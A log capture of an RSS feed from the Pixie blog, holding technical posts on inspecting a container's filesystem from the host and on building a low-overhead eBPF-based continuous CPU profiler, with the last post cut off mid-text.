5:35:42 PM: '</code></pre><p>This is a great way to start. And if it works for all your needs, you should continue using it.</p><p>One downside of this approach, however, is that it requires a shell to be present inside the container. If no <code>/bin/bash</code>, <code>/bin/sh</code> or other shell is present inside the container, then this approach won’t work. Many of the containers we build for the Pixie project, for example, are based on <code>distroless</code> and don’t have a shell included to keep image sizes small. In those cases, this approach doesn’t work.</p><p>Even if a shell is available, you won’t have access to all the tools you’re used to. So if there’s no <code>grep</code> installed inside the container, then you also won’t have access to <code>grep</code>. That’s another reason to look for something better.</p><h2>Method 2: Using nsenter</h2><p>If you get a little more advanced, you’ll realize that container processes are just like other processes on the Linux host, only running inside a namespace to keep them isolated from the rest of the system.</p><p>So you could use the <a href="https://man7.org/linux/man-pages/man1/nsenter.1.html"><code>nsenter</code></a> command to enter the namespace of the target container, using something like this:</p><pre><code class="language-bash"># Get the host PID of the process in the container\n' +

5:35:42 PM: 'PID=$(docker container inspect mycontainer | jq '.[0].State.Pid')\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# Use nsenter to go into the container’s mount namespace.\n' +

5:35:42 PM: 'sudo nsenter -m -t $PID /bin/bash\n' +

5:35:42 PM: '</code></pre><p>This enters the mount (<code>-m</code>) namespace of the target process (<code>-t $PID</code>), and runs <code>/bin/bash</code>. Entering the mount namespace essentially means we get the view of the filesystem that the container sees.</p><p>This approach may seem more promising than the <code>docker exec</code> approach, but runs into a similar issue: it requires <code>/bin/bash</code> (or some other shell) to be in the target container. If we were entering anything other than the mount namespace, we could still access the files on the host, but because we’re entering the mount namespace before executing <code>/bin/bash</code> (or other shell), we’re out of luck if there’s no shell inside the mount namespace.</p><h2>Method 3: Copy with docker</h2><p>A different approach to the problem is simply to copy the relevant files to the host, and then work with the copy.</p><p>To copy selected files from a running container, you can use:</p><pre><code class="language-bash">docker cp mycontainer:/path/to/file file\n' +

5:35:42 PM: '</code></pre><p>It's also possible to snapshot the entire filesystem with:</p><pre><code class="language-bash">docker export mycontainer -o container_fs.tar\n' +

5:35:42 PM: '</code></pre><p>These commands give you the ability to inspect the files, and are a big improvement over first two methods when the container may not have a shell or the tools you need.</p><h2>Method 4: Finding the filesystem on the host</h2><p>The copy method solves a lot of our issues, but what if you are trying to monitor a log file? Or what if you're trying to deploy an eBPF probe to a file inside the container? In these cases copying doesn't work.</p><p>We’d really like to access the container’s filesystem directly from the host. The container’s files should be somewhere on the host's filesystem, but where?</p><p>Docker's <code>inspect</code> command has a clue for us:</p><pre><code class="language-bash">docker container inspect mycontainer | jq '.[0].GraphDriver'\n' +

5:35:42 PM: '</code></pre><p>Which gives us:</p><pre><code class="language-json">{\n' +

5:35:42 PM: ' "Data": {\n' +

5:35:42 PM: ' "LowerDir": "/var/lib/docker/overlay2/63ec1a08b063c0226141a9071b5df7958880aae6be5dc9870a279a13ff7134ab-init/diff:/var/lib/docker/overlay2/524a0d000817a3c20c5d32b79c6153aea545ced8eed7b78ca25e0d74c97efc0d/diff",\n' +

5:35:42 PM: ' "MergedDir": "/var/lib/docker/overlay2/63ec1a08b063c0226141a9071b5df7958880aae6be5dc9870a279a13ff7134ab/merged",\n' +

5:35:42 PM: ' "UpperDir": "/var/lib/docker/overlay2/63ec1a08b063c0226141a9071b5df7958880aae6be5dc9870a279a13ff7134ab/diff",\n' +

5:35:42 PM: ' "WorkDir": "/var/lib/docker/overlay2/63ec1a08b063c0226141a9071b5df7958880aae6be5dc9870a279a13ff7134ab/work"\n' +

5:35:42 PM: ' },\n' +

5:35:42 PM: ' "Name": "overlay2"\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '</code></pre><p>Let’s break this down:</p><ul><li><code>LowerDir</code>: Includes the filesystems of all the layers inside the container except the last one</li><li><code>UpperDir</code>: The filesystem of the top-most layer of the container. This is also where any run-time modifications are reflected.</li><li><code>MergedDir</code>: A combined view of all the layers of the filesystem.</li><li><code>WorkDir</code>: An internal working directory used to manage the filesystem.</li></ul><div class="image-xl"><svg title="Structure of container filesystems based on overlayfs." src="overlayfs.png"></svg></div><p>So to see the files inside our container, we simply need to look at the MergedDir path.</p><pre><code class="language-bash">sudo ls /var/lib/docker/overlay2/63ec1a08b063c0226141a9071b5df7958880aae6be5dc9870a279a13ff7134ab/merged\n' +

5:35:42 PM: '</code></pre><p>If you want to learn in more detail how the filesystem works, you can check out this excellent blog post on the overlay filesystem by Martin Heinz: <a href="https://martinheinz.dev/blog/44">https://martinheinz.dev/blog/44</a>.</p><h2>Method 5: /proc/<pid>/root</h2><p>Saving the best for last, there’s an even easier way to find the container’s filesystem from the host. Using the host PID of a process inside the container, you can simply run:</p><pre><code class="language-bash">sudo ls /proc/<pid>/root\n' +

5:35:42 PM: '</code></pre><p>Linux has taken care of giving you a view into the mount namespace of the process.</p><p>At this point, you’re probably thinking: why didn’t we just lead with this approach and make it a one-line blog post...but it’s all about the journey, right?</p><h2>Bonus: /proc/<pid>/mountinfo</h2><p>For the curious, all the information about the container’s overlay filesystem discussed in Method 4 can also be discovered directly from the Linux <code>/proc</code> filesystem. If you simply look at <code>/proc/<pid>/mountinfo</code>, you’ll see something like this:</p><pre><code class="language-bash">2363 1470 0:90 / / rw,relatime master:91 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/YZVAVZS6HYQHLGEPJHZSWTJ4ZU:/var/lib/docker/overlay2/l/ZYW5O24UWWKAUH6UW7K2DGV3PB,upperdir=/var/lib/docker/overlay2/63ec1a08b063c0226141a9071b5df7958880aae6be5dc9870a279a13ff7134ab/diff,workdir=/var/lib/docker/overlay2/63ec1a08b063c0226141a9071b5df7958880aae6be5dc9870a279a13ff7134ab/work\n' +

5:35:42 PM: '2364 2363 0:93 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw\n' +

5:35:42 PM: '2365 2363 0:94 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64\n' +

5:35:42 PM: '…\n' +

5:35:42 PM: '</code></pre><p>Here you can see that the container has mounted an overlay filesystem as its root. It also reports the same type of information that <code>docker inspect</code> reports, including the <code>LowerDir</code> and <code>UpperDir</code> of the container’s filesystem. It’s not directly showing the <code>MergedDir</code>, but you can just take the <code>UpperDir</code> and change <code>diff</code> to <code>merged</code>, and you have a view into the filesystem of the container.</p><h2>How we use this at Pixie</h2><p>At the beginning of this blog, I mentioned how the Pixie project needs to place eBPF probes on containers. Why and how?</p><p>The Stirling module inside Pixie is responsible for collecting observability data. Being k8s-native, a lot of the data that is collected comes from applications running in containers. Stirling also uses eBPF probes to gather data from the processes it monitors. For example, Stirling deploys eBPF probes on OpenSSL to trace encrypted messages (see the <a href="https://blog.px.dev/ebpf-openssl-tracing/">SSL tracing blog</a> if you want more details on that).</p><p>Since each container bundles its own OpenSSL and other libraries, any eBPF probes Stir'... 919 more characters
}

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Building a Continuous Profiler Part 1: An Intro to App Profiling',

5:35:42 PM: date: '2021-05-24',

5:35:42 PM: description: 'Application profiling tools are not new, but they are often a hassle to use. Many profilers require you to recompile your application or at…',

5:35:42 PM: url: 'https://blog.px.dev/cpu-profiling/',

5:35:42 PM: guid: 'https://blog.px.dev/cpu-profiling/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>Application profiling tools are not new, but they are often a hassle to use. Many profilers require you to recompile your application or at the very least to rerun it, making them less than ideal for the lazy developer who would like to debug performance issues on the fly.</p><p>Earlier this year, we built the tool we’d like to have in our personal perf toolkit - a continuous profiler that is incredibly easy to use: no instrumentation, no redeployment, no enablement; just automatic access to CPU profiles whenever needed.</p><p>Over the next 3 blog posts, we’ll show how to build and productionize this continuous profiler for Go and other compiled languages (C/C++, Rust) with very low overhead (<1% and decreasing):</p><ul><li><a href="/cpu-profiling/#part-1:-an-introduction-to-application-performance-profiling">Part 1: An intro to application performance profiling.</a></li><li><a href="/cpu-profiling-2">Part 2: A simple eBPF-based CPU profiler.</a></li><li><a href="/cpu-profiling-3">Part 3: The challenges of building a continuous CPU profiler in production.</a></li></ul><p>Want to try out Pixie’s profiler before seeing how we built it? Check out the <a href="https://docs.px.dev/tutorials/profiler">tutorial</a>.</p><h2>Part 1: An Introduction to Application Performance Profiling</h2><p>The job of an application performance profiler is to figure out where your code is spending its time. This information can help developers resolve performance issues and optimize their applications.</p><p>For the profiler, this typically means collecting stack traces to understand which functions are most frequently executing. The goal is to output something like the following:</p><pre><code class="language-bash">70% main(); compute(); matrix_multiply()\n' +

5:35:42 PM: '10% main(); read_data(); read_file()\n' +

5:35:42 PM: ' 5% main(); compute(); matrix_multiply(); prepare()\n' +

5:35:42 PM: '...\n' +

5:35:42 PM: '</code></pre><p>Above is an example stack traces from a profiler. Percentages show the number of times a stack trace has been recorded with respect to the total number of recorded stack traces.</p><p>This example shows several stack traces, and immediately tells us our code is in the body of <code>matrix_multiply()</code> 70% of the time. There’s also an additional 5% of time spent in the <code>prepare()</code> function called by <code>matrix_multiply()</code>. Based on this example, we should likely focus on optimizing <code>matrix_multiply()</code>, because that’s where our code is spending the majority of its time.</p><p>While this simple example is easy to follow, when there are deep stacks with lots of branching, it may be difficult to understand the full picture and identify performance bottlenecks. To help interpret the profiler output, the <a href="http://www.brendangregg.com/flamegraphs.html">flamegraph</a>, popularized by Brendan Gregg, is a useful visualization tool.</p><p>In a flamegraph, the x-axis represents time, and the y-axis shows successive levels of the call stack. One can think of the bottom-most bar as the "entire pie”, and as you move up, you can see how the total time is spent throughout the different functions of your code. For example, in the flamegraph below, we can see our application spends 80% of its time in <code>compute()</code>, which in turn spends the majority of its time in <code>matrix_multiply()</code>.</p><div class="image-xl"><svg title="Example flamegraph. All percentages are relative to the total number of samples (i.e. relative to main)" src="flamegraph.png"></svg></div><p>In a flamegraph, wide bars indicate program regions that consume a large fraction of program time (i.e. hot spots), and these are the most obvious candidates for optimization. Flamegraphs also help find hot spots that might otherwise be missed in a text format. For example, <code>read_data()</code> appears in many sampled stack traces, but never as the leaf. By putting all the stack traces together into a flamegraph, we can immediately see that it consumes 15% of the total application time.</p><h3>How Do Profilers Work Anyway?</h3><p>So profilers can grab stack traces, and we can visualize the results in flamegraphs. Great! But you’re probably now wondering: <em>how</em> do profilers get the stack trace information?</p><p>Early profilers used instrumentation. By adding measurement code into the binary, instrumenting profilers collect information every time a function is entered or exited. An example of this type of profiler is the historically popular <code>gprof</code> tool (gprof is actually a hybrid profiler which uses sampling and instrumentation together). Unfortunately, the instrumentation part can add significant overhead, <a href="https://www.researchgate.net/publication/221235356_Low-overhead_call_path_profiling_of_unmodified_optimized_code">up to 260%</a> in some cases.</p><p>More recently, sampling-based profilers have become widely used due to their low overhead. The basic idea behind sampling-based profilers is to periodically interrupt the program and record the current stack trace. The stack trace is recovered by looking at the instruction pointer of the application on the CPU, and then inspecting the stack to find the instruction pointers of all the parent functions (frames) as well. Walking the stack to reconstruct a stack trace has some complexities, but the basic case is shown below. One starts at the leaf frame, and uses frame pointers to successively find the next parent frame. Each stack frame contains a return address instruction pointer which is recorded to construct the entire stack trace.</p><div class="image-m"><svg title="A program’s call stack. Frame pointers can be used to walk the stack and record the return addresses to generate a stack trace." src="callstack.png"></svg></div><p>By sampling stack traces many thousands of times, one gets a good idea of where the code spends its time. This is fundamentally a statistical approach, so the more samples are collected, the more confidence you’ll have that you’ve found a real hot-spot. You also have to ensure there’s no correlation between your sampling methodology and the target application, so you can trust the results, but a simple timer-based approach typically works well.</p><p>Sampling profilers can be very efficient, to the point that there is negligible overhead. For example, if one samples a stack trace every 10 ms, and we assume (1) the sampling process requires 10,000 instructions (this is a generous amount according to our measurements), and (2) that the CPU processes 1 billion instructions per second, then a rough calculation (10000*100/1B) shows a theoretical performance overhead of only 0.1%.</p><p>A third approach to profiling is simulation, as used by Valgrind/Callgrind. Valgrind uses no instrumentation, but runs your program through a virtual machine which profiles the execution. This approach provides a lot of information, but is also high in overheads.</p><p>The table below summarizes properties of a number of popular performance profilers.</p><table><thead><tr><th>Profiler</th><th>Methodology</th><th>Deployment</th><th>Traces Libraries/System Calls?</th><th>Performance Overhead</th></tr></thead><tbody><tr><td><a href="https://sourceware.org/binutils/docs/gprof/">gprof</a></td><td>Instrumentation + Sampling</td><td>Recompile & Rerun</td><td>No</td><td>High (up to <a href="https://www.researchgate.net/publication/221235356_Low-overhead_call_path_profiling_of_unmodified_optimized_code">260%</a>)</td></tr><tr><td><a href="https://valgrind.org/docs/manual/cl-manual.html">Callgrind</a></td><td>Simulation</td><td>Rerun</td><td>Yes</td><td>Very High (<a href="https://www.cs.cmu.edu/afs/cs.cmu.edu/project/cmt-40/Nice/RuleRefinement/bin/valgrind-3.2.0/docs/html/cl-manual.html">>400%</a>)</td></tr><tr><td><a href="https://github.com/gperftools/gperftools">gperftools</a></td><td>Sampling (User-space only)</td><td>Rerun</td><td>Yes</td><td>Low</td></tr><tr><td><a href="https://oprofile.sourceforge.io/about/">oprofile</a>, linux <a href="https://github.com/torvalds/linux/tree/master/tools/perf">perf</a>, <a href="https://github.com/iovisor/bcc/blob/master/tools/profile.py">bcc_profile</a></td><td>Sampling (Kernel-assisted)</td><td>Profile any running process</td><td>Yes</td><td>Low</td></tr></tbody></table><p>For Pixie, we wanted a profiling methodology that (1) had very low overheads, and (2) required no recompilation or redeployment. This meant we were clearly looking at sampling-based profilers.</p><p>In <a href="/cpu-profiling-2">part two</a> of this series, we’ll examine how to build a simple sampling-based profiler using eBPF and <a href="https://github.com/iovisor/bcc/">BCC</a>.</p>'

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Building a Continuous Profiler Part 2: A Simple eBPF-Based Profiler',

5:35:42 PM: date: '2021-06-01',

5:35:42 PM: description: 'In the last blog post , we discussed the basics of CPU profilers for compiled languages like Go, C++ and Rust. We ended by saying we wanted…',

5:35:42 PM: url: 'https://blog.px.dev/cpu-profiling-2/',

5:35:42 PM: guid: 'https://blog.px.dev/cpu-profiling-2/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>In the last <a href="/cpu-profiling/#part-1:-an-introduction-to-application-performance-profiling">blog post</a>, we discussed the basics of CPU profilers for compiled languages like Go, C++ and Rust. We ended by saying we wanted a sampling-based profiler that met these two requirements:</p><ol><li><p>Does not require recompilation or redeployment: This is critical to Pixie’s auto-telemetry approach to observability. You shouldn’t have to instrument or even re-run your application to get observability.</p></li><li><p>Has very low overheads: This is required for a continuous (always-on) profiler, which was desirable for making performance profiling as low-effort as possible.</p></li></ol><p>A few existing profilers met these requirements, including the Linux <a href="https://github.com/torvalds/linux/tree/master/tools/perf">perf</a> tool. In the end, we settled on the BCC eBPF-based profiler developed by Brendan Gregg <a href="http://www.brendangregg.com/blog/2016-10-21/linux-efficient-profiler.html">[1]</a> as the best reference. With eBPF already at the heart of the Pixie platform, it was a natural fit, and the efficiency of eBPF is undeniable.</p><p>If you’re familiar with eBPF, it’s worth checking out the source code of the <a href="https://github.com/iovisor/bcc/blob/v0.20.0/tools/profile.py">BCC implementation</a>. For this blog, we’ve prepared our own simplified version that we’ll examine in more detail.</p><h2>An eBPF-based profiler</h2><p>The code to our simple eBPF-based profiler can be found <a href="https://github.com/pixie-io/pixie-demos/tree/main/ebpf-profiler">here</a>, with further instructions included at the end of this blog (see <a href="/cpu-profiling-2/#running-the-demo-profiler">Running the Demo Profiler</a>). We’ll be explaining how it works, so now’s a good time to clone the repo.</p><p>Also, before diving into the code, we should mention that the Linux developers have already put in dedicated hooks for collecting stack traces in the kernel. These are the main APIs we use to collect stack traces (and this is how the official BCC profiler works well). We won’t, however, go into Linux’s implementation of these APIs, as that’s beyond the scope of this blog.</p><p>With that said, let’s look at some BCC eBPF code. Our basic structure has three main components:</p><pre><code class="language-cpp">const int kNumMapEntries = 65536;\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'BPF_STACK_TRACE(stack_traces, kNumMapEntries);\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'BPF_HASH(histogram, struct stack_trace_key_t, uint64_t, kNumMapEntries);\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'int sample_stack_trace(struct bpf_perf_event_data* ctx) {\n' +

5:35:42 PM: ' // Collect stack traces\n' +

5:35:42 PM: ' // ...\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '</code></pre><p>Here we define:</p><ol><li><p>A <code>BPF_STACK_TRACE</code> data structure called <code>stack_traces</code> to hold sampled stack traces. Each entry is a list of addresses representing a stack trace. The stack trace is accessed via an assigned stack trace ID.</p></li><li><p>A <code>BPF_HASH</code> data structure called <code>histogram</code> which is a map from the sampled location in the code to the number of times we sampled that location.</p></li><li><p>A function <code>sample_stack_trace</code> that will be periodically triggered. The purpose of this eBPF function is to grab the current stack trace whenever it is called, and to populate/update the <code>stack_traces</code> and <code>histogram</code> data structures appropriately.</p></li></ol><p>The diagram below shows an example organization of the two data structures.</p><div class="image-xl"><svg title="The two main data structures for our eBPF performance profiler. The stack_traces map records stack traces and assigns them an id. The histogram map counts the number of times a particular location in the code (defined by the combination of the user stack trace and kernel stack trace) is sampled." src="profiler-data-structures.png"></svg></div><p>As we’ll see in more detail later, we’ll set up our BPF code to trigger on a periodic timer. This means every X milliseconds, we’ll interrupt the CPU and trigger the eBPF probe to sample the stack traces. Note that this happens regardless of which process is on the CPU, and so the eBPF profiler is actually a system-wide profiler. We can later filter the results to include only the stack traces that belong to our application.</p><div class="image-xl"><svg title="The `sample_stack_trace` function is set-up to trigger periodically. Each time it triggers, it collects the stack trace and updates the two maps." src="sample-stack-trace-function.png"></svg></div><p>Now let’s look at the full BPF code inside <code>sample_stack_trace</code>:</p><pre><code class="language-cpp">int sample_stack_trace(struct bpf_perf_event_data* ctx) {\n' +

5:35:42 PM: ' // Sample the user stack trace, and record in the stack_traces structure.\n' +

5:35:42 PM: ' int user_stack_id = stack_traces.get_stackid(&ctx->regs, BPF_F_USER_STACK);\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' // Sample the kernel stack trace, and record in the stack_traces structure.\n' +

5:35:42 PM: ' int kernel_stack_id = stack_traces.get_stackid(&ctx->regs, 0);\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' // Update the counters for this user+kernel stack trace pair.\n' +

5:35:42 PM: ' struct stack_trace_key_t key = {};\n' +

5:35:42 PM: ' key.pid = bpf_get_current_pid_tgid() >> 32;\n' +

5:35:42 PM: ' key.user_stack_id = user_stack_id;\n' +

5:35:42 PM: ' key.kernel_stack_id = kernel_stack_id;\n' +

5:35:42 PM: ' histogram.increment(key);\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' return 0;\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '</code></pre><p>Surprisingly, that’s it! That’s the entirety of our BPF code for our profiler. Let’s break it down...</p><p>Remember that an eBPF probe runs in the context when it was triggered, so when this probe gets triggered it has the context of whatever program was running on the CPU. Then it essentially makes two calls to <code>stack_traces.get_stackid()</code>: one to get the current user-code stack trace, and another to get the kernel stack trace. If the code was not in kernel space when interrupted, the second call simply returns EEXIST, and there is no stack trace. You can see that all the heavy-lifting is really done by the Linux kernel.</p><p>Next, we want to update the counts for how many times we’ve been at this exact spot in the code. For this, we simply increment the counter for the entry in our histogram associated with the tuple {pid, user_stack_id, kernel_stack_id}. Note that we throw the PID into the histogram key as well, since that will later help us know which process the stack trace belongs to.</p><h2>We’re Not Done Yet</h2><p>While the eBPF code above samples the stack traces we want, we still have a little more work to do. The remaining tasks involve:</p><ol><li><p>Setting up the trigger condition for our BPF program, so it runs periodically.</p></li><li><p>Extracting the collecting data from BPF maps.</p></li><li><p>Converting the addresses in the stack traces into human readable symbols.</p></li></ol><p>Fortunately, all this work can be done in user-space. No more eBPF required.</p><p>Setting up our BPF program to run periodically turns out to be fairly easy. Again, credit goes to the BCC and eBPF developers. The crux of this setup is the following:</p><pre><code class="language-cpp">bcc->attach_perf_event(\n' +

5:35:42 PM: ' PERF_TYPE_SOFTWARE,\n' +

5:35:42 PM: ' PERF_COUNT_SW_CPU_CLOCK,\n' +

5:35:42 PM: ' std::string(probe_fn),\n' +

5:35:42 PM: ' sampling_period_millis * kNanosPerMilli,\n' +

5:35:42 PM: ' 0);\n' +

5:35:42 PM: '</code></pre><p>Here we’re telling the BCC to set up a trigger based on the CPU clock by setting up an event based on <code>PERF_TYPE_SOFTWARE/PERF_COUNT_SW_CPU_CLOCK</code>. Every time this value reaches a multiple of <code>sampling_period_millis</code>, the BPF probe will trigger and call the specified <code>probe_fn</code>, which happens to be our <code>sample_stack_trace</code> BPF program. In our demo code, we’ve set the sampling period to be every 10 milliseconds, which will collect 100 samples/second. That’s enough to provide insight over a minute or so, but also happens infrequently enough so it doesn’t add noticeable overheads.</p><p>After deploying our BPF code, we have to collect the results from the BPF maps. We access the maps from user-space using the BCC APIs:</p><pre><code class="language-cpp">ebpf::BPFStackTable stack_traces =\n' +

5:35:42 PM: ' bcc->get_stack_table(kStackTracesMapName);\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'ebpf::BPFHashTable<stack_trace_key_t, uint64_t> histogram =\n' +

5:35:42 PM: ' bcc->get_hash_table<stack_trace_key_t, uint64_t>(kHistogramMapName);\n' +

5:35:42 PM: '</code></pre><p>Finally, we want to convert our addresses to symbols, and to concatenate our user and kernel stack traces. Fortunately, BCC has once again made our life easy on this one. In particular, there is a call <code>stack_traces.get_stack_symbol</code>, that will convert the list of addresses in a stack trace into a list of symbols. This function needs the PID, because it will lookup the debug symbols in the process’s object file to perform the translation.</p><pre><code class="language-cpp"> std::map<std::string, int> result;\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' for (const auto& [key, count] : histogram.get_table_offline()) {\n' +

5:35:42 PM: ' if (key.pid != target_pid) {\n' +

5:35:42 PM: ' continue;\n' +

5:35:42 PM: ' }\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' std::string stack_trace_str;\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' if (key.user_stack_id >= 0) {\n' +

5:35:42 PM: ' std::vector<std::string> user_stack_symbols =\n' +

5:35:42 PM: ' stack_traces.get_stack_symbol(key.user_stack_id, key.pid);\n' +

5:35:42 PM: ' for (const auto& sym : user_stack_symbols) {\n' +

5:35:42 PM: ' stack_trace_str += sym;\n' +

5:35:42 PM: ' stack_trace_str += ";";\n' +

5:35:42 PM: ' }\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' if (key.kernel_stack_id >= 0) {\n' +

5:35:42 PM: ' std::vector<std::string> user_stack_symbols =\n' +

5:35:42 PM: ' stack_traces.get_stack_symbol(key.kernel_stack_id, -1);\n' +

5:35:42 PM: ' for (const auto& sym : user_stack_symbols) {\n' +

5:35:42 PM: ' stack_trac'... 2535 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Building a Continuous Profiler Part 3: Optimizing for Prod Systems',

5:35:42 PM: date: '2021-08-16',

5:35:42 PM: description: 'This is the third part in a series of posts describing how we built a continuous (always-on) profiler for identifying application…',

5:35:42 PM: url: 'https://blog.px.dev/cpu-profiling-3/',

5:35:42 PM: guid: 'https://blog.px.dev/cpu-profiling-3/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>This is the third part in a series of posts describing how we built a <a href="https://docs.px.dev/tutorials/pixie-101/profiler/">continuous (always-on) profiler</a> for identifying application performance issues in production Kubernetes clusters.</p><p>We were motivated to build a continuous profiler based on our own experience debugging performance issues. Manually profiling an application on a Kubernetes node without recompiling or redeploying the target application is not easy: one has to connect to the node, collect the stack traces with an appropriate system profiler, transfer the data back and post-process the results into a useful visualization, all of which can be quite frustrating when trying to figure out a performance issue. We wanted a system-wide profiler that we could leave running all the time, and which we could instantly query to get CPU <a href="https://www.brendangregg.com/flamegraphs.html">flamegraphs</a> without any hassle.</p><p>In <a href="/cpu-profiling/">Part 1</a> and <a href="/cpu-profiling-2/">Part 2</a>, we discussed the basics of profiling and walked through a simple but fully functional eBPF-based CPU profiler (inspired by the <a href="https://github.com/iovisor/bcc/blob/master/tools/profile.py">BCC profiler</a>) which would allow us to capture stack traces without requiring recompilation or redeployment of profiled applications.</p><p>In this post, we discuss the process of turning the basic profiler into one with only 0.3% CPU overhead, making it suitable for continuous profiling of all applications in production systems.</p><h2>Profiling the profiler</h2><p>To turn the basic profiler implementation from Part 2 into a continuous profiler, it was just a "simple” matter of leaving the eBPF profiler running all the time, such that it continuously collects stack traces into eBPF maps. We then periodically gather the stack traces and store them to generate flamegraphs when needed.</p><p>While this approach works, we had expected our profiler to have <0.1% CPU overhead based on the low cost of gathering stack trace data (measured at ~3500 CPU instructions per stack trace)<sup id="fnref-1"><a href="#fn-1" class="footnote-ref">1</a></sup>. The actual overhead of the initial implementation, however, was 1.3% CPU utilization -- over 10x what we had expected. It turned out that the stack trace processing costs, which we had not accounted for, matter quite a lot for continuous profilers.</p><p>Most basic profilers can be described as "single shot” in that they first collect raw stack traces for a period of time, and then process the stack traces after all the data is collected. With "single shot” profilers, the one-time post-processing costs of moving data from the kernel to user space and looking up address symbols are usually ignored. For a continuous profiler, however, these costs are also running continuously and become as important as the other overheads.</p><p>With CPU overhead much higher than anticipated, we used our profiler to identify its own hotspots. By examining the flamegraphs, we realized that two post-processing steps were dominating CPU usage: (1) symbolizing the addresses in the stack trace, and (2) moving data from kernel to user space.</p><div class="image-xl"><svg title="A flamegraph of the continuous profiler showing significant time spent in BPF system calls: clear_table_non_atomic(), get_addr_symbol(), bpf_get_first_key()." src="profiler-flamegraph.png"></svg></div><h2>Performance optimizations</h2><p>Based on the performance insights above, we implemented three specific optimizations:</p><ol><li>Adding a symbol cache.</li><li>Reducing the number of BPF system calls.</li><li>Using a perf buffer instead of BPF hash map for exporting histogram data.</li></ol><h3>Adding a symbol cache</h3><p>For a stack trace to be human readable, the raw instruction addresses need to be translated into function names or symbols. To symbolize a particular address, ELF debug information from the underlying binary is searched for the address range that includes the instruction address<sup id="fnref-2"><a href="#fn-2" class="footnote-ref">2</a></sup>.</p><p>The flamegraph clearly showed that we were spending a lot of time in symbolization, as evidenced by the time spent in <code>ebpf::BPFStackTable::get_addr_symbol()</code>. To reduce this cost, we implemented a symbol cache that is checked before accessing the ELF information.</p><div class="image-l"><svg title="Caching the symbols for individual instruction addresses\n' +

5:35:42 PM: 'speeds up the process of symbolization." src="symbol-cache.png"></svg></div><p>We chose to cache individual stack trace addresses, rather than entire stack frames. This is effective because while many stack traces diverge at their tip, they often share common ancestry towards their base. For example, main is a common symbol at the base of many stack traces.</p><p>Adding a symbol cache provided a 25% reduction (from 1.27% to 0.95%) in CPU utilization.</p><h3>Reducing the number of BPF system calls</h3><p>From <a href="/cpu-profiling-2/">Part 2</a>, you may recall that our profiler has two main data structures:</p><ol><li>A <code>BPFStackTable</code> records stack traces and assigns them an id.</li><li>A <code>BPFHashTable</code> counts the number of times a particular location in the code (defined by the combination of the user stack trace and kernel stack trace) is sampled.</li></ol><p>To transfer and clear the data in these structures from kernel to user space, the initial profiler implementation used the following BCC APIs:</p><pre><code class="language-cpp">BPFStackTable::get_stack_symbol() // Read & symbolize one stack trace\n' +

5:35:42 PM: 'BPFStackTable::clear_table_non_atomic() // Prepare for next use\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'BPFHashTable::get_table_offline() // Read stack trace histogram\n' +

5:35:42 PM: 'BPFHashTable::clear_table_non_atomic() // Prepare for next use\n' +

5:35:42 PM: '</code></pre><p>Flamegraph analysis of our profiler in production showed a significant amount of time spent in these calls. Examining the call stack above <code>get_table_offline()</code> and <code>clear_table_non_atomic()</code> revealed that each call repeatedly invoked two eBPF system calls to traverse the BPF map: one syscall to find the next entry and another syscall to read or clear it.</p><p>For the <code>BPFStackTable</code>, the <code>clear_table_non_atomic()</code> method is even less efficient because it visits and attempts to clear every possible entry rather than only those that were populated.</p><p>To reduce the duplicated system calls, we edited the BCC API to combine the tasks of reading and clearing the eBPF shared maps into one pass that we refer to as "consuming” the maps.</p><div class="image-xl"><svg title="Combining the BCC APIs for accessing and clearing\n' +

